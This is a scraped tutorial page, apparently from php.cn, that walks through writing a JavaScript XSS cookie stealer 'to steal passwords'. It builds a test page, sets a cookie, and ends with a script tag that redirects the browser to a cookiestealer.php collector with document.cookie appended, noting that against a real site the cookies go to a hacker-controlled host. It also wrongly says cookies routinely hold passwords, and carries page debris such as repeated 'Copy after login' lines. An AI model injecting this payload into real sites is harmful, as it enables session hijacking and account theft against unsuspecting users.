Detailed explanation of how to write XSS cookie stealer in JS to steal passwords-JS Tutorial-php.cn

Detailed explanation of how to write XSS cookie stealer in JS to steal passwords

小云云

Release： 2017-12-18 14:36:29

Original

2134 people have browsed it

This article mainly introduces the detailed steps of writing XSS cookie stealer in JS to steal passwords. Friends who need it can refer to it. I hope it can help everyone. JavaScript is the most commonly used script development language in the web. JS can automatically execute site components, manage site content, and implement other useful functions in the web industry. JS can have many functions that can be used for malicious purposes, including stealing user cookies containing passwords and other content.

Cookies are information that a site requests and maintains for a specific visited page. Cookies contain authentication information such as access method, time, username and password, etc. When a user visits a given site, a cookie must be used; if an attacker can intercept the cookie, the cookie can be used to steal some of the user's information. For a specific domain name, JS can be used to save or modify the user's cookie. In other words, if an attacker can use JS to view and modify cookies, then this can become a valuable hacking technique.

JS-based attacks can be effectively combined with techniques such as code injection, which may cause malicious code to be executed on trusted websites.

Start creating the XSS cookie stealer

Step 1: Create an HTML Test page

First , create a standard HTML page

mkdir cookiestealer
cd cookiestealer
touch index.html

Copy after login

Then, edit index.html

nano index.html
<html>
<body>
</body>
</html>

Copy after login

Test page

Step 2: Create Cookie

Create a basic parameter that can be inserted into the cookie—— string. This cookie can only be used on this page. Likewise, subsequent injections will also apply to all cookies saved on this page.

 <script type="text/javascript">document.cookie = "username=Null Byte";</script>

Copy after login

This script should be inserted into the part of HTML, as follows:

##If you run this script When the page is opened, the cookie will be set, but nothing will be displayed in the browser. We can view the cookie directly using the document.write function.

document.write(document.cookie);

Copy after login

The script with the same function is as follows:

 <script type="text/javascript">
 document.cookie = "username=Null Byte";
 document.write(document.cookie);
 </script>

Copy after login

In the browser When you open the page, the following cookie information will appear:

It means that we successfully set the cookie of "

username=Null Byte" for this page. .

Step 3: Use js script to steal Cookies

The js string we use to pass cookies to the server uses the document.cookie parameter, but we use document The url defined in .location.

document.location=&#39;http://127.0.0.1/cookiestealer.php?c=&#39;+document.cookie;

Copy after login

In this example, the PHP file is located on localhost (127.0.0.1).

If the target is a social media website, the script needs to be injected into the site and the stolen cookies sent to an IP or URL controlled by the hacker.

Put the js code into the <script> tag: <p></p><p class="jb51code">##<div class="code" style="position:relative; padding:0px; margin:0px;"><pre class="brush:js;"><script type="text/javascript"> document.location=&#39;http://127.0.0.1/cookiestealer.php?c=&#39;+document.cookie; </script>

Copy after login